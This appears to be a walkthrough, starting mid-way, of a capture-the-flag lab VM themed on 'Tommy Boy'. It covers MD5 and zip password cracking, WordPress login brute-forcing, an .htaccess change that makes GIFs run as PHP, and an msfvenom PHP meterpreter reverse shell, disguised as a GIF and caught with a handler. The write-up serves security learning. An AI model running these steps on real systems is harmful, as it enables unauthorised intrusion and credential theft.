daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
tommy:x:1000:1000:Tommy,,,:/home/tommy:/bin/bash
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin


A passwd file with 2 users “root”, “tommy”. Maybe useful later on.
Let wget richard/.

shockedrichard

What could be freaking him out so much. EXIF that pic!

[*] exec: exif /root/hacking/TB/loot/web/richard/shockedrichard.jpg

EXIF tags in '/root/hacking/TB/loot/web/richard/shockedrichard.jpg' ('Intel' byte order):
--------------------+----------------------------------------------------------
Tag                 |Value
--------------------+----------------------------------------------------------
Software            |Google
Copyright           |Copyright © 1995 Paramount Pictures Corporation. Credit: ©
X-Resolution        |72
Y-Resolution        |72
Resolution Unit     |Inch
Exif Version        |Exif Version 2.2
User Comment        |ce154b5a8e59c89732bc25d6a2e6b90b
Pixel X Dimension   |1600
Pixel Y Dimension   |1029
FlashPixVersion     |FlashPix Version 1.0
Color Space         |Internal error (unknown value 65535)
--------------------+----------------------------------------------------------


Interesting hash in the user comment: ce154b5a8e59c89732bc25d6a2e6b90b. MD5?

root@kali:~# hash-identifier
   #########################################################################
   #	 __  __ 		    __		 ______    _____	   #
   #	/\ \/\ \		   /\ \ 	/\__  _\  /\  _ `\	   #
   #	\ \ \_\ \     __      ____ \ \ \___	\/_/\ \/  \ \ \/\ \	   #
   #	 \ \  _  \  /'__`\   / ,__\ \ \  _ `\	   \ \ \   \ \ \ \ \	   #
   #	  \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \	    \_\ \__ \ \ \_\ \	   #
   #	   \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/	   #
   #	    \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
   #								 By Zion3R #
   #							www.Blackploit.com #
   #						       Root@Blackploit.com #
   #########################################################################

   -------------------------------------------------------------------------
 HASH: ce154b5a8e59c89732bc25d6a2e6b90b  

Possible Hashs:
[+]  MD5
[+]  Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+]  RAdmin v2.x
[+]  NTLM
[+]  MD4
[+]  MD2
[+]  MD5(HMAC)
[+]  MD4(HMAC)
[+]  MD2(HMAC)
[+]  MD5(HMAC(WordPress))
[+]  Haval-128
[+]  Haval-128(HMAC)
[+]  RipeMD-128
[+]  RipeMD-128(HMAC)
[+]  SNEFRU-128
[+]  SNEFRU-128(HMAC)
[+]  Tiger-128
[+]  Tiger-128(HMAC)
[+]  md5($pass.$salt)
[+]  md5($salt.$pass)
[+]  md5($salt.$pass.$salt)
[+]  md5($salt.$pass.$username)
[+]  md5($salt.md5($pass))
[+]  md5($salt.md5($pass))
[+]  md5($salt.md5($pass.$salt))
[+]  md5($salt.md5($pass.$salt))
[+]  md5($salt.md5($salt.$pass))
[+]  md5($salt.md5(md5($pass).$salt))
[+]  md5($username.0.$pass)
[+]  md5($username.LF.$pass)
[+]  md5($username.md5($pass).$salt)
[+]  md5(md5($pass))
[+]  md5(md5($pass).$salt)
[+]  md5(md5($pass).md5($salt))
[+]  md5(md5($salt).$pass)
[+]  md5(md5($salt).md5($pass))
[+]  md5(md5($username.$pass).$salt)
[+]  md5(md5(md5($pass)))
[+]  md5(md5(md5(md5($pass))))
[+]  md5(md5(md5(md5(md5($pass)))))
[+]  md5(sha1($pass))
[+]  md5(sha1(md5($pass)))
[+]  md5(sha1(md5(sha1($pass))))
[+]  md5(strtoupper(md5($pass)))

   --------------------------------------------------------------------------


Yup, looks like it. Let look at the other service running before we swing into full gear.
 

» :8008

The site hails me with “KEEP OUT”.

This is only for Nick's super secret stuff. If you don't know where to go from here, you're not sup3rl33t enough.
Leave now!
Only me and Steve Jobs are allowed to look at this stuff.
Lol
-Nick


So this is |\|1ck’s 53cr37 dr0p80x! He seems to be operating this site so maybe this is the first guy with interesting privs.

 

» :65534

There should be ftp here however now I cannot connect.

[*] exec: nc 192.168.1.23 65534
(UNKNOWN) [192.168.1.23] 65534 (?) : Connection refused


OK – port closed… Well that’s unfortunate. A scan of the port gives me no joy either.
 
 

Message Digest number 5

The first to digging in would be to follow the trail of the password protected blogpost. So I spent quite some time getting hashcat to work and GREAT SUCCES!

[*] exec: hashcat -m 0 -a 0 ce154b5a8e59c89732bc25d6a2e6b90b /usr/share/wordlists/rockyou.txt

hashcat (v3.10) starting...

OpenCL Platform #1: Mesa, skipped! No OpenCL compatible devices found

OpenCL Platform #2: Intel(R) Corporation
========================================
- Device #1: Intel(R) HD Graphics, 815/1630 MB allocatable, 20MCU
- Device #2: Intel(R) Core(TM) i7-4600U CPU @ 2.10GHz, skipped

Hashes: 1 hashes; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable Optimizers:
* Zero-Byte
* Precompute-Init
* Precompute-Merkle-Demgard
* Meet-In-The-Middle
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
Watchdog: Temperature abort trigger disabled
Watchdog: Temperature retain trigger disabled

Generating dictionary stats for /usr/share/wordlists/rockyou.txt: 33553434 bytes (23.98%), 3627555 words                                                                                                        Generated dictionary stats for /usr/share/wordlists/rockyou.txt: 139921507 bytes, 14344392 words, 14343297 keyspace

ce154b5a8e59c89732bc25d6a2e6b90b:spanky


The password for the hash is “spanky”. Altough the pic served as a reminder this will most likely be the password for the blog-post lets check some services nonetheless. SSH does nothing. Hey – FTP is back up!!

[*] exec: nc 192.168.1.23 65534

220 Callahan_FTP_Server 1.3.5
user tommy
331 Password required for tommy
pass spanky
530 Login incorrect.
pass tommy
etc.etc.etc.


Nope nothing, but wth - FTP is back up. So it's up for a time, down for a time? Let's move on with the blogpost for now.

 

Attack the Blog https://youtu.be/ezVF3sDBv5A

When we put the password in we get our next big break in this very important mess of restoring a backup.

Michelle/Tommy,

This is f’d up.

I am currently working to restore the company’s online ordering system, but we are having some problems getting it restored from backup.  Unfortunately, only Big Tom had the passwords to log into the system.  I can’t find his passwords anywhere.  All I can find so far is a note from our IT guy Nick (whose last day was yesterday) saying:

Hey Richy,

So you asked me to do a write-up of everything I know about the Callahan server so the next moron who is hired to support you idiots can get up to speed faster.

Here’s everything I know:

    You guys are all hopeless sheep :-/
    The Callahan Auto Web site is usually pretty stable.  But if for some reason the page is ever down, you guys will probably go out of business.  But, thanks to *me* there’s a backup called callahanbak.bak that you can just rename to index.html and everything will be good again.
        IMPORTANT: You have to do this under Big Tom’s account via SSH to perform this restore.  Warning: Big Tom always forgets his account password.  Warning #2: I screwed up his system account when I created it on the server, so it’s not called what it should be called.  Eh, I can’t remember (don’t care) but just look at the list of users on the system and you’ll figure it out.

    I left a few other bits of information in my home folder, which the new guy can access via FTP.  Oh, except I should mention that the FTP server is super flaky and I haven’t had the time (i.e. I don’t give a fat crap) to fix it.  Basically I couldn’t get it running on the standard port, so I put it on a port that most scanners would get exhausted looking for.  And to make matters more fun, the server seems to go online at the top of the hour for 15 minutes, then down for 15 minutes, then up again, then down again.  Now it’s somebody else’s problem (did I mention I don’t give a rat’s behind?).

    You asked me to leave you with my account password for the server, and instead of laughing in your face (which is what I WANTED to do), I just reset my account (“nickburns” in case you’re dumb and can’t remember) to a very, VERY easy to guess password.  I removed my SSH access because I *DON’T* want you calling me in case of an emergency.  But my creds still work on FTP.  Your new fresh fish can connect using my credentials and if he/she has half a brain.

Good luck, schmucks!

LOL

-Nick

Michelle/Tommy…WTF are we going to do?!?!  If this site stays down, WE GO OUT OF BUSINESS!!!1!!1!!!!!!!

-Richard

Yeah - that explains perfectly what's going on: nickburns. So restore the backup with Big Toms account via SSH, find useful stuff on FTP - which incidentily seems to go online at the top of the hour for 15 minutes, then down for 15 minutes, then up again, then down again.
Let's try and find some password for all the users we have right now.
I run wpscan --url http://192.168.1.23/prehistoricforest/ --wordlist /usr/share/wordlists/rockyou.txt --username for every username I have.

[+] Starting the password brute forcer
  [+] [SUCCESS] Login : tom Password : tomtom1                                                          

  Brute Forcing 'tom' Time: 00:07:02 <                        > (24680 / 14344393)  0.17%  ETA: 68:02:15
  +----+-------+------+----------+
  | Id | Login | Name | Password |
  +----+-------+------+----------+
  |    | tom   |      | tomtom1  |
  +----+-------+------+----------+

So Big Tom has the password "tomtom1". On his login page I find some interesting stuff.

Ok so Nick always yells at me for forgetting the second part of my "ess ess eight (ache? H?) password so I'm writing it here:

1938!!

Nick, if you're reading this, I DON'T CARE IF I"M USING THIS THING AS A PASSWORD VAULT. YOU TOOK AWAY MY STICKIES SO I"LL PUT MY PASSWORDS ANY DANG PLACE I WANT.

Yep, I had a lengthy discussion once with a senior sales exec about him putting his passwords on a sticky on his desk. I even guessed his password of his personal e-mail (let's say it was a combo of his daughter, wife and a year.) during that convo. So the second part of his SSH pass is "1938". What could be the first part? Still no flag though so let's dig on, I've spent a lot of time bruteforcing multiple accounts already

 

FTP

We get to the FTP part but the service is down for the moment. Just have a short wait. So let's have a look at what "nickburns" has left us on the FTP server at port 65534. Since the password is supposed to be stupidly simple i'll give it a guess.

root@kali:~# ftp 192.168.1.23 65534
Connected to 192.168.1.23.
220 Callahan_FTP_Server 1.3.5
Name (192.168.1.23:root): nickburns
331 Password required for nickburns
Password:
230 User nickburns logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lah
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-x---   4 nickburns nickburns     4.0k Jul 20 20:42 .
drwxr-x---   4 nickburns nickburns     4.0k Jul 20 20:42 ..
-rw-r--r--   1 root     root            0 Jul 21 22:47 .bash_history
drwx------   2 nickburns nickburns     4.0k Jul  6 22:37 .cache
drwxrwxr-x   2 nickburns nickburns     4.0k Jul  6 22:37 .nano
-rw-rw-r--   1 nickburns nickburns      977 Jul 15 02:37 readme.txt
226 Transfer complete


Yes, simple indeed nickburns. Simple indeed. Let's have a look at what's in the readme.txt

cat readme.txt 
To my replacement:

If you're reading this, you have the unfortunate job of taking over IT responsibilities
from me here at Callahan Auto.  HAHAHAHAHAAH! SUCKER!  This is the worst job ever!  You'll be
surrounded by stupid monkeys all day who can barely hit Ctrl+P and wouldn't know a fax machine
from a flame thrower!

Anyway I'm not completely without mercy.  There's a subfolder called "NickIzL33t" on this server
somewhere. I used it as my personal dropbox on the company's dime for years.  Heh. LOL.
I cleaned it out (no naughty pix for you!) but if you need a place to dump stuff that you want
to look at on your phone later, consider that folder my gift to you.

Oh by the way, Big Tom's a moron and always forgets his passwords and so I made an encrypted
.zip of his passwords and put them in the "NickIzL33t" folder as well.  But guess what?
He always forgets THAT password as well.  Luckily I'm a nice guy and left him a hint sheet.

Good luck, schmuck!

LOL.

-Nick

Well, we know where he keeps his L33t <||20|>80>< with a .zip containing the passwords no less. But Big Tom always forgets THAT password so there is a hint sheet.  

Dropboxin' - :8008/NickIzL33t

The site greets us with the following and shows nothing else in the source:

<H1>Nick's sup3r s3cr3t dr0pb0x - only me and Steve Jobs can see this content</H1><H2>Lol</H2>


This is the second time he mentions Steve. Fan-boy? Does he use an iPhone to connect? Let's fire up Burp, maybe I need to send a magic cookie or something. Which I fail at doing successfully. So maybe I have to make the website think I'm an iPhone because I don't think it's an app. I'm looking to change my User-Agent to something with iPhone. I find that Burp Suite even has it built-in. N01<3!

burpheader
This is the respone.

HTTP/1.1 301 Moved Permanently
Date: Tue, 04 Oct 2016 21:56:11 GMT
Server: Apache/2.4.18 (Ubuntu)
Location: http://192.168.1.23:8008/NickIzL33t/
Content-Length: 324
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://192.168.1.23:8008/NickIzL33t/">here</a>.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.1.23 Port 8008</address>
</body></html>


I follow the redirect and send a GET /NickIzL33t/ request and get another response back.

brainiac

Genius, brainiac indeed. He sure has a way with words. So we gots to know the exact name of the .html to break into nickburns 'fortress'.
I also find out I could've done it with curl

curl -A "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3" -v http://192.168.1.23:8008/NickIzL33t
and, 
curl -A "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3" -v http://192.168.1.23:8008/NickIzL33t/ <------


Since we are going to have to specify the User-Agent for this one it's DirBuster-time. These are the settings.

dirbuster

Put it in the oven at 4 threads with about a 125 requests/sec and let it simmer for a while. I find that I have to tweak dirbuster but no matter what it keeps producing "IllegalArgumentException Invalid uri"-errors. It's fine that the URI is invalid because you don't play well with 'special' characters - just keep checking and don't stop plzkthnxbye. After about 15 minutes (time to finish was 1 Day) I find fallon1.html in the results tab. Let's see what it says.

[*] exec: curl --user-agent "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3" -v http://192.168.1.23:8008/NickIzL33t/fallon1.html

*   Trying 192.168.1.23...
% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
Dload  Upload   Total   Spent    Left  Speed
0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0* Connected to 192.168.1.23 (192.168.1.23) port 8008 (#0)
> GET /NickIzL33t/fallon1.html HTTP/1.1
> Host: 192.168.1.23:8008
> User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Wed, 05 Oct 2016 14:05:30 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Last-Modified: Fri, 15 Jul 2016 17:44:52 GMT
< ETag: "1cb-537b02d09e6a9"
< Accept-Ranges: bytes
< Content-Length: 459
< Vary: Accept-Encoding
< Content-Type: text/html
<
{ [459 bytes data]
100   459  100   459    0     0   311k      0 --:--:-- --:--:-- --:--:--  448k
* Connection #0 to host 192.168.1.23 left intact
<html>
<title>W 0 W!</title>
Nice work.  Here are the goodies in Nick's personal super secret dropbox:
<p>
<ul>
<li><a href="hint.txt">A hint</a> - you'll need it
<li><a href="flagtres.txt">The third flag</a> - you're not hopeless after all
<li><a href="t0msp4ssw0rdz.zip">Big Tom's encrypted pw backups</a> - because that big tub of dumb can never remember them
</ul>
<!--Note: Still working on file upload capabilities in the P4TCH_4D4MS folder-->
</html>


W00t, flag 3! Now that we have a bit of stuff we can navigate to, let's change the user-agent in our browser to easily browse to it. I use Firefox and rather not use any unnecessary extentions: How to.
The contents of hint.txt:

Big Tom,

Your password vault is protected with (yep, you guessed it) a PASSWORD!  
And because you were choosing stupidiculous passwords like "password123" and "brakepad" I
enforced new password requirements on you...13 characters baby! MUAHAHAHAHAH!!!

Your password is your wife's nickname "bev" (note it's all lowercase) plus the following:

* One uppercase character
* Two numbers
* Two lowercase characters
* One symbol
* The year Tommy Boy came out in theaters

Yeah, fat man, that's a lot of keys to push but make sure you type them altogether in one 
big chunk ok?  Heh, "big chunk."  A big chunk typing big chunks.  That's funny.

LOL

-Nick

flagtres.txt

THREE OF 5 FLAGS - you're awesome sauce.

Flag data: TinyHead
Flags so far:
#1: B34rcl4ws
#2: Z4l1nsky
#3: TinyHead

Next I follow the comment about the P4TCH_4D4MS and it leads to an image upload form. Could be exploitable.

<!DOCTYPE html>
<html>
<body>

<form action="upload.php" method="post" enctype="multipart/form-data">
Select image to upload:
<input type="file" name="fileToUpload" id="fileToUpload">
<input type="submit" value="Upload Image" name="submit">
</form>

</body>
</html>


I check upload.php

Sorry genius, that file already exists. Sorry, only JPG, JPEG, PNG & GIF files are allowed, douchenozzle! Sorry, your file was not uploaded.  Want me to save your game of Minesweeper though? 


I upload 6packsofsoda.jpg as a test.

The file 6packsofsoda.jpg has been uploaded to /uploads.

Let's check /P4TCH_4D4MS/uploads/

Nick's sup3r s3cr3t dr0pb0x - only me and Steve Jobs can see this content

Lol


It get the very familiar hint and .../P4TCH_4D4MS/uploads/6packsofsoda.jpg is there. Let's move on to the .ZIP-file with password hints and compile a wordlist with these criteria to brute it.
 

Lunch-time is Crunch-time

Crunch spits out a pretty big list.

[*] exec: crunch 13 13 -t bev,%%@@^1995 -o /root/hacking/TB/zippass.lst

Crunch will now generate the following amount of data: 812011200 bytes
774 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 58000800 

crunch:  77% completed generating output

crunch: 100% completed generating output


Insert into fcrackzip when ready.

[*] exec: fcrackzip -D -p /root/hacking/TB/zippass.lst -u -v /root/hacking/TB/loot/nickizl33t/t0msp4ssw0rdz.zip

found file 'passwords.txt', (size cp/uc    332/   641, flags 9, chk 9aad)
checking pw bevG72kn~1995                           

PASSWORD FOUND!!!!: pw == bevH00tr$1995


Extracting the .zip with the password yields us passwords.txt which contains:


Sandusky Banking Site
------------------------
Username: BigTommyC
Password: money

TheKnot.com (wedding site)
---------------------------
Username: TomC
Password: wedding

Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat

Note: after the """ part there are some numbers, but I don't remember what they are.
However, I wrote myself a draft on the company blog with that information.

Callahan Company Blog
----------------------------
Username: bigtom(I think?)
Password: ??? 
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.


Now that we know what the login is for SSH we can pwn this b0x f0 r34l.
 

SSH

The login should be user "bigtommysenior" and pass "fatguyinalittlecoat1938!!".

root@kali:~# ssh -l bigtommysenior 192.168.1.23
bigtommysenior@192.168.1.23's password: 
Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0-38-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

99 packages can be updated.
2 updates are security updates.


Last login: Wed Oct  5 11:06:04 2016 from 192.168.1.25
bigtommysenior@CallahanAutoSrv01:~$ ls -lah
total 44K
drwxr-x--- 4 bigtommysenior bigtommysenior 4.0K Jul  8 08:57 .
drwxr-xr-x 5 root           root           4.0K Jul  7 00:17 ..
-rw------- 1 bigtommysenior bigtommysenior   13 Oct  5 11:06 .bash_history
-rw-r--r-- 1 bigtommysenior bigtommysenior  220 Jul  7 00:12 .bash_logout
-rw-r--r-- 1 bigtommysenior bigtommysenior 3.7K Jul  7 00:12 .bashrc
drwx------ 2 bigtommysenior bigtommysenior 4.0K Jul  7 00:16 .cache
-rw-r--r-- 1 bigtommysenior bigtommysenior  307 Jul  7 14:18 callahanbak.bak
-rw-rw-r-- 1 bigtommysenior bigtommysenior  237 Jul  7 15:27 el-flag-numero-quatro.txt
-rw-rw-r-- 1 bigtommysenior bigtommysenior  630 Jul  7 17:59 LOOT.ZIP
drwxrwxr-x 2 bigtommysenior bigtommysenior 4.0K Jul  7 13:50 .nano
-rw-r--r-- 1 bigtommysenior bigtommysenior  675 Jul  7 00:12 .profile
-rw-r--r-- 1 bigtommysenior bigtommysenior    0 Jul  7 00:17 .sudo_as_admin_successful
bigtommysenior@CallahanAutoSrv01:~$ id
uid=1002(bigtommysenior) gid=1002(bigtommysenior) groups=1002bigtommysenior


Ye we in baby! And it looks like we have the backup, el flag numero quatro and LOOT!!.
Flag 4

YAY!  Flag 4 out of 5!!!! And you should now be able to restore the Callhan Web server to normal
working status.

Flag data: EditButton

But...but...where's flag 5?  

I'll make it easy on you.  It's in the root of this server at /5.txt


LOOT.zip is password protected and contains THE-END.txt. Let's poke around a bit and restore the .bak file.

bigtommysenior@CallahanAutoSrv01:~$ cp callahanbak.bak /var/www/html/index.html


The website is back! Thanks Webguy!

callahanonline

Flag 5 should be in "/" - and it is.

bigtommysenior@CallahanAutoSrv01:/$ ls -lah
total 105K
drwxr-xr-x  25 root     root     4.0K Oct  2 18:00 .
drwxr-xr-x  25 root     root     4.0K Oct  2 18:00 ..
-rwxr-x---   1 www-data www-data  520 Jul  7 15:36 .5.txt
drwxr-xr-x   2 root     root     4.0K Oct  2 17:58 bin
drwxr-xr-x   4 root     root     1.0K Oct  3 06:14 boot
drwxr-xr-x  20 root     root     4.2K Oct  5 06:37 dev
drwxr-xr-x  92 root     root     4.0K Oct  5 11:24 etc
drwxr-xr-x   5 root     root     4.0K Jul  7 00:17 home
lrwxrwxrwx   1 root     root       32 Oct  2 18:00 initrd.img -> boot/initrd.img-4.4.0-38-generic
lrwxrwxrwx   1 root     root       32 Jul 14 13:38 initrd.img.old -> boot/initrd.img-4.4.0-31-generic
drwxr-xr-x  22 root     root     4.0K Jul  6 11:01 lib
drwxr-xr-x   2 root     root     4.0K Jul  6 11:01 lib32
drwxr-xr-x   2 root     root     4.0K Jul  6 08:30 lib64
drwxr-xr-x   2 root     root     4.0K Jul  6 11:01 libx32
drwx------   2 root     root      16K Jul  6 08:30 lost+found
drwxr-xr-x   3 root     root     4.0K Jul  6 08:30 media
drwxr-xr-x   2 root     root     4.0K Apr 20 17:08 mnt
drwxr-xr-x   2 root     root     4.0K Apr 20 17:08 opt
dr-xr-xr-x 200 root     root        0 Oct  5 06:36 proc
drwx------   3 root     root     4.0K Oct  5 06:37 root
drwxr-xr-x  25 root     root      940 Oct  5 11:25 run
drwxr-xr-x   2 root     root      12K Oct  2 17:58 sbin
drwxr-xr-x   2 root     root     4.0K Apr 19 09:31 snap
drwxr-xr-x   2 root     root     4.0K Apr 20 17:08 srv
dr-xr-xr-x  13 root     root        0 Oct  5 11:22 sys
drwxrwxrwt   9 root     root     4.0K Oct  5 12:39 tmp
drwxr-xr-x  12 root     root     4.0K Jul  6 11:01 usr
drwxr-xr-x  15 root     root     4.0K Jul 14 13:53 var
lrwxrwxrwx   1 root     root       29 Oct  2 18:00 vmlinuz -> boot/vmlinuz-4.4.0-38-generic
lrwxrwxrwx   1 root     root       29 Jul 14 13:38 vmlinuz.old -> boot/vmlinuz-4.4.0-31-generic


I can't read it. Though "www-data" can.

interesting

 

Dropboxin' Part 2 - 73H PWN1N9!!1

So the dropbox works on a basis of denying access to any device that is not an iPhone via .htaccess.

BrowserMatchNoCase "iPhone" allowed
Order Deny,Allow
Deny from ALL
Allow from env=allowed
ErrorDocument 403 "blablablablabla"


I had already discovered an upload to the system earlier and during my poking around I found the location on disk for it at /var/thatsg0nnaleaveamark - owned and operated by "www-data". The fact that the /var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads/ dir has got 777 is very nice. But what is supremely naisuru is that can execute GIF as PHP

bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ cat .htaccess 
BrowserMatchNoCase "iPhone" allowed
AddType application/x-httpd-php .gif
Order Deny,Allow
Deny from ALL
Allow from env=allowed
ErrorDocument 403 "herpderpderp"


But my uploaded test pic is on here as well and can only be read like everything else... so can it be deleted?

bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ ls -lah
total 52K
drwxrwxrwx 2 www-data       www-data       4.0K Oct  5 13:15 .
drwxr-xr-x 3 www-data       www-data       4.0K Jul 15 12:47 ..
-rw-r--r-- 1 www-data       www-data        34K Oct  5 10:12 6packsofsoda.jpg
-rw-r--r-- 1 root           root              0 Oct  5 13:15 .htaccess
-rw-r--r-- 1 root           root            447 Jul 15 12:32 index.html
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ rm 6packsofsoda.jpg 
rm: remove write-protected regular file '6packsofsoda.jpg'? y
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ ls -lah
total 16K
drwxrwxrwx 2 www-data       www-data       4.0K Oct  5 13:16 .
drwxr-xr-x 3 www-data       www-data       4.0K Jul 15 12:47 ..
-rw-r--r-- 1 root           root              0 Oct  5 13:15 .htaccess
-rw-r--r-- 1 root           root            447 Jul 15 12:32 index.html
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ rm .htaccess 
rm: remove write-protected regular file '.htaccess'? y
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ ls -lah
total 12K
drwxrwxrwx 2 www-data www-data 4.0K Oct  5 13:17 .
drwxr-xr-x 3 www-data www-data 4.0K Jul 15 12:47 ..
-rw-r--r-- 1 root     root      447 Jul 15 12:32 index.html
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ touch .htaccess
bigtommysenior@CallahanAutoSrv01:/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads$ ls -lah
total 12K
drwxrwxrwx 2 www-data www-data             4.0K Oct  5 13:17 .
drwxr-xr-x 3 www-data www-data             4.0K Jul 15 12:47 ..
-rw-r--r-- 1 bigtommysenior bigtommysenior    0 Oct  5 13:15 .htaccess
-rw-r--r-- 1 root     root                  447 Jul 15 12:32 index.html


Thanks Obama!
notbadobama
I was thinking if I could make this dropbox a bit more public and since we had a dir that was pretty public I decided to just rm .htaccess and create my own.

.../uploads$ echo -e 'AddType application/x-httpd-php .php .gif\nAllow from ALL' > .htaccess

Now we have a choice in how we deliver the Pwnage and choice is everything!
One php reverse-shell comin' right up! I was actually feeling a bit creative so I took to making an actual GIF with the phpcode embedded which will be read when accessing the page on the server.

[*] exec: msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.25 LPORT=4444 -o /root/hacking/TB/sploits/overnyanthousand.gif

No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 26800 bytes
Saved as: /root/hacking/TB/overnyanthousand.gif

Tadaa!

overnyanthousand

I upload it to the server and browse to .../P4TCH_4D4MS/uploads/overnyanthousand.gif. Time to tune in with meterpreter

msf > use exploit/multi/handler 
msf exploit(handler) > set payload php/meterpreter_reverse_tcp 
payload => php/meterpreter_reverse_tcp
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.1.25:4444 
[*] Starting the payload handler...
[*] Meterpreter session 2 opened (192.168.1.25:4444 -> 192.168.1.23:54796) at 2016-10-05 22:26:35 +0200

meterpreter > pwd
/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads
meterpreter > shell
Process 12104 created.
Channel 0 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
cd /
ls -lah
total 105K
drwxr-xr-x  25 root     root     4.0K Oct  2 18:00 .
drwxr-xr-x  25 root     root     4.0K Oct  2 18:00 ..
-rwxr-x---   1 www-data www-data  520 Jul  7 15:36 .5.txt
drwxr-xr-x   2 root     root     4.0K Oct  2 17:58 bin
drwxr-xr-x   4 root     root     1.0K Oct  3 06:14 boot
drwxr-xr-x  20 root     root     4.2K Oct  5 06:37 dev
drwxr-xr-x  92 root     root     4.0K Oct  5 11:24 etc
drwxr-xr-x   5 root     root     4.0K Jul  7 00:17 home
lrwxrwxrwx   1 root     root       32 Oct  2 18:00 initrd.img -> boot/initrd.img-4.4.0-38-generic
lrwxrwxrwx   1 root     root       32 Jul 14 13:38 initrd.img.old -> boot/initrd.img-4.4.0-31-generic
drwxr-xr-x  22 root     root     4.0K Jul  6 11:01 lib
drwxr-xr-x   2 root     root     4.0K Jul  6 11:01 lib32
drwxr-xr-x   2 root     root     4.0K Jul  6 08:30 lib64
drwxr-xr-x   2 root     root     4.0K Jul  6 11:01 libx32
drwx------   2 root     root      16K Jul  6 08:30 lost+found
drwxr-xr-x   3 root     root     4.0K Jul  6 08:30 media
drwxr-xr-x   2 root     root     4.0K Apr 20 17:08 mnt
drwxr-xr-x   2 root     root     4.0K Apr 20 17:08 opt
